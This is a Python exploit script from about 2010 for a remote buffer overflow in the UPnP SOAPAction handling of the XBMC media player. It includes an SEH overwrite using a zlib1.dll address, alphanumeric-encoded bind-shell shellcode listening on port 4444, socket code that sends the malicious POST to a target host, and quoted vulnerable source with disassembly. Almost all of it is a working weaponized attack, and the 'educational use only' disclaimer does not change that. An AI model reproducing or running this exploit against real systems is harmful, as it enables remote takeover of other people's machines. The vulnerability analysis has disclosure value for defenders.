|
#!/usr/bin/env python
''' - XBMC upnp Remote Buffer Overflow -
=========================================================================
! Exploit Title: Xbmc soap_action_name post upnp sscanf buffer overflow !
=========================================================================
Date: 28th October 2010
=======================
Author: n00b Realname: *carl cope*
===================================
Software Link: http://xbmc.org/download/
========================================
Version: All versions are affected.
===================================
Tested on: Windows xp sp3,Vista sp2.
XBMC 9.04.1r20672 compiled june 2 2009. <--Version tested.
----------------------------------------------------------
-Description-
Well i had a little time to spare so i decided to revisit the
xbmc application and give it another look over which is a good
thing as i just have not had to time to work on exploit development
lately and have to put more important things first unfortunately.
I decided to test the upnp protocol that was built into xbmc using the
Platinum UPnP SDK.And come across a sscanf buffer overflow
as you can see in the source code at the bottom of this exploit
that 100 bytes is allocated into a temp stack and then passed to
the sscanf function with no bounds check in place then its finally
passed to PLT_HttpHelper::ParseBody which reads the xml body and parse it.
I've tested this exploit on windows and linux both work (Read comments).
All versions of xbmc where tested even the Dharma Beta 3 release is
also exploitable.But as ive worked with the xbmc developers before i
know it will be fixed and patched as soon as i have informed them
great guys unlike other vendors i've worked with in the past.
I know the vulnerable function was marked with FIX ME = no sscanf.
They must have either missed it or have not got round to fixing this
yet.(See bottom of exploit for code)
The buffer overflow exists because of the vulnerable sdk used in the
xbmc application.All versions of xbmc are exploitable but version 9.11
modules is compiled with seh protection.And i know previous release
loaded the zlib1 module which was not compiled with safe seh.
See poc code for information and list of vendors.!!
-Description-
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
#Windows version does not change port every time its restarted.!!
#linux version changes port every time xbmc is restarted.!!
port = 52569 #You will have to find it on vuln server.
host = sys.argv[1]
''' !!IMPORTATNT!!
The UUID must be set i've hardcoded this
to make it easy to replace with the victim UUID
you can get the UUID number from the server
by issuing a get request to the vulnerable server
on port 00000 you can use a web browser to do this.
example = http://127.0.0.1:00000
-Note-
Just a side note the port is random and once the xbmc
application is installed the UUID will be set up along
with the port number at installation so you will have to
do a port scan to find what port the service is running
on but once its found it will be on that port till it
is reinstalled.Also the UUID will stay the same.
Universally Unique Identifier
---------------------------------------------------
XML example
<UDN>
uuid:0970aa46-ee68-3174-d548-44b656447658
</UDN>
---------------------------------------------------
-Note-
I was not going to write an xml paraser just for this
when a web browser and a set of eyes can do it.:)
Xbmc media player uses the Platinum UPnP SDK
http://www.plutinosoft.com/platinum
'''
#Create upnp request and place it in Request !!
Start_url ='AVTransport/'
Uuid = '1edcbdab-e75b-57fe-dbfa-55cc24ee630c' #Replace with the vuln server's Universally Unique Identifier.
End_url ='/control.xml HTTP/1.1\n'
Soap = 'SOAPACTION: "urn:schemas-upnp-org:service:AVTransport:1#'
Junk_buffer1 = 'A'*128
Junk_buffer2 = 'B'*100
###The same address i used for the last xbmc exploits.
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Base=0x62e80000
# Limit=0x62e97000
# Module Name=C:\Program Files\XBMC\zlib1.dll
###
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
SE_Handler = struct.pack('<L',0x62E83BAC)
Content_type = '\nCONTENT-TYPE:text/xml; charset="utf-8"\n'
Host = 'HOST: 192.168.1.2:50988\n'
Content_length = 'Content-Length: 345'
Shell_code=(#/*win32_bind - EXITFUNC=seh LPORT=4444 Size=696
#Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x37\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x69"
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x79\x32\x42\x42\x32\x41\x42"
"\x42\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x39\x6c\x31"
"\x7a\x4a\x4b\x72\x6d\x59\x78\x78\x79\x59\x6f\x49\x6f\x79\x6f\x45"
"\x30\x4c\x4b\x70\x6c\x61\x34\x34\x64\x6c\x4b\x71\x55\x77\x4c\x4c"
"\x4b\x63\x4c\x43\x35\x41\x68\x56\x61\x68\x6f\x4e\x6b\x70\x4f\x56"
"\x78\x6e\x6b\x51\x4f\x65\x70\x77\x71\x5a\x4b\x31\x59\x6e\x6b\x47"
"\x44\x6e\x6b\x45\x51\x6a\x4e\x75\x61\x6b\x70\x6c\x59\x6e\x4c\x4d"
"\x54\x4f\x30\x31\x64\x54\x47\x59\x51\x39\x5a\x46\x6d\x77\x71\x39"
"\x52\x78\x6b\x6b\x44\x57\x4b\x73\x64\x51\x34\x71\x38\x30\x75\x6d"
"\x35\x6c\x4b\x71\x4f\x74\x64\x73\x31\x78\x6b\x51\x76\x4c\x4b\x74"
"\x4c\x70\x4b\x4e\x6b\x51\x4f\x77\x6c\x36\x61\x4a\x4b\x43\x33\x56"
"\x4c\x4e\x6b\x4c\x49\x30\x6c\x47\x54\x45\x4c\x31\x71\x78\x43\x30"
"\x31\x4b\x6b\x50\x64\x6c\x4b\x50\x43\x70\x30\x4e\x6b\x57\x30\x34"
"\x4c\x4e\x6b\x32\x50\x55\x4c\x6c\x6d\x4e\x6b\x41\x50\x63\x38\x61"
"\x4e\x55\x38\x4e\x6e\x50\x4e\x66\x6e\x4a\x4c\x50\x50\x49\x6f\x6e"
"\x36\x52\x46\x36\x33\x70\x66\x30\x68\x44\x73\x65\x62\x30\x68\x44"
"\x37\x73\x43\x35\x62\x31\x4f\x71\x44\x4b\x4f\x38\x50\x45\x38\x5a"
"\x6b\x78\x6d\x6b\x4c\x75\x6b\x56\x30\x79\x6f\x6b\x66\x61\x4f\x4f"
"\x79\x6b\x55\x43\x56\x4c\x41\x7a\x4d\x37\x78\x35\x52\x66\x35\x50"
"\x6a\x34\x42\x79\x6f\x58\x50\x41\x78\x78\x59\x67\x79\x4c\x35\x6e"
"\x4d\x73\x67\x79\x6f\x4e\x36\x50\x53\x46\x33\x76\x33\x42\x73\x51"
"\x43\x53\x73\x70\x53\x77\x33\x56\x33\x6b\x4f\x78\x50\x65\x36\x43"
"\x58\x66\x71\x31\x4c\x73\x56\x33\x63\x6c\x49\x59\x71\x7a\x35\x30"
"\x68\x4e\x44\x36\x7a\x62\x50\x39\x57\x76\x37\x6b\x4f\x6b\x66\x43"
"\x5a\x32\x30\x72\x71\x32\x75\x39\x6f\x58\x50\x30\x68\x39\x34\x4e"
"\x4d\x66\x4e\x4a\x49\x51\x47\x4b\x4f\x49\x46\x66\x33\x62\x75\x79"
"\x6f\x4a\x70\x62\x48\x4d\x35\x33\x79\x6b\x36\x71\x59\x66\x37\x4b"
"\x4f\x5a\x76\x76\x30\x50\x54\x70\x54\x70\x55\x4b\x4f\x6e\x30\x4a"
"\x33\x30\x68\x4b\x57\x43\x49\x38\x46\x74\x39\x63\x67\x6b\x4f\x58"
"\x56\x61\x45\x4b\x4f\x6e\x30\x51\x76\x41\x7a\x65\x34\x42\x46\x31"
"\x78\x30\x63\x62\x4d\x6f\x79\x6b\x55\x33\x5a\x36\x30\x56\x39\x31"
"\x39\x48\x4c\x4f\x79\x6d\x37\x73\x5a\x33\x74\x6b\x39\x6d\x32\x67"
"\x41\x59\x50\x6c\x33\x6c\x6a\x79\x6e\x33\x72\x54\x6d\x49\x6e\x70"
"\x42\x34\x6c\x6e\x73\x6c\x4d\x30\x7a\x34\x78\x4c\x6b\x4c\x6b\x4c"
"\x6b\x42\x48\x50\x72\x39\x6e\x6d\x63\x52\x36\x49\x6f\x61\x65\x50"
"\x44\x49\x6f\x7a\x76\x63\x6b\x71\x47\x31\x42\x73\x61\x51\x41\x66"
"\x31\x30\x6a\x44\x41\x31\x41\x63\x61\x71\x45\x32\x71\x59\x6f\x6e"
"\x30\x70\x68\x4c\x6d\x6e\x39\x53\x35\x7a\x6e\x41\x43\x49\x6f\x79"
"\x46\x52\x4a\x6b\x4f\x6b\x4f\x65\x67\x4b\x4f\x7a\x70\x6e\x6b\x30"
"\x57\x59\x6c\x6d\x53\x6a\x64\x50\x64\x39\x6f\x5a\x76\x52\x72\x39"
"\x6f\x5a\x70\x50\x68\x58\x70\x6f\x7a\x54\x44\x63\x6f\x52\x73\x4b"
"\x4f\x6a\x76\x49\x6f\x4e\x30\x69"
)
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Start_url + Uuid + End_url + Soap + Junk_buffer1 + Pointer_To_Next_SEH +
SE_Handler + Shell_code + Junk_buffer2 + Content_type + Host + Content_length)
# create a file-like object to read
fileobj = c.makefile('r', 0)
fileobj.write("POST /"+Request+"")
# -Vulnerable source code-
# This information was found using windows 7 + Visual c++ 2010 express.
# .\xbmc\xbmc\lib\libUPnP\Platinum\Source\Core\PltDeviceHost.cpp
# /*----------------------------------------------------------------------
# | PLT_DeviceHost::ProcessPostRequest
# +---------------------------------------------------------------------*/
# NPT_Result
# PLT_DeviceHost::ProcessHttpPostRequest(NPT_HttpRequest& request,
# const NPT_HttpRequestContext& context,
# NPT_HttpResponse& response)
# {
# NPT_Result res;
# NPT_String service_type;
# NPT_String str;
# NPT_XmlElementNode* xml = NULL;
# NPT_String soap_action_header;
# PLT_Service* service;
# NPT_XmlElementNode* soap_body;
# NPT_XmlElementNode* soap_action;
# const NPT_String* attr;
# PLT_ActionDesc* action_desc;
# PLT_ActionReference action;
# NPT_MemoryStreamReference resp(new NPT_MemoryStream);
# NPT_String ip_address = context.GetRemoteAddress().GetIpAddress().ToString();
# NPT_String method = request.GetMethod();
# NPT_String url = request.GetUrl().ToRequestString(true);
# NPT_String protocol = request.GetProtocol();
# if (NPT_FAILED(FindServiceByControlURL(url, service, true)))
# goto bad_request;
# if (!request.GetHeaders().GetHeaderValue("SOAPAction"))
# goto bad_request;
# // extract the soap action name from the header
# soap_action_header = *request.GetHeaders().GetHeaderValue("SOAPAction");
# soap_action_header.TrimLeft('"');
# soap_action_header.TrimRight('"');
# char prefix[200];
# char soap_action_name[100]; <--- 100 bytes allocated for the soap action name.
# int ret;
# //FIXME: no sscanf
# ret = sscanf(soap_action_header, "%[^#]#%s", <---
# prefix, <--- Bad very Bad.
# soap_action_name); <---
# if (ret != 2)
# goto bad_request;
# // read the xml body and parse it
# if (NPT_FAILED(PLT_HttpHelper::ParseBody(request, xml))) <--- BOOOM I WIN!!
# goto bad_request;
# Disassembly of vulnerable function.!!
# ==================================
# 025D2D23 lea edx,[ebp-1F4h]
# 025D2D29 push edx
# 025D2D2A lea eax,[ebp-188h]
# 025D2D30 push eax
# 025D2D31 push 2F5E404h
# 025D2D36 lea ecx,[ebp-44h]
# 025D2D39 call NPT_String::operator char const * (1B1840Eh)
# 025D2D3E push eax
# 025D2D3F call @ILT+120575(_sscanf) (1AF7704h)
# 025D2D44 add esp,10h
# 025D2D47 mov dword ptr [ebp-1FCh],eax
|
推荐
评论(0条)
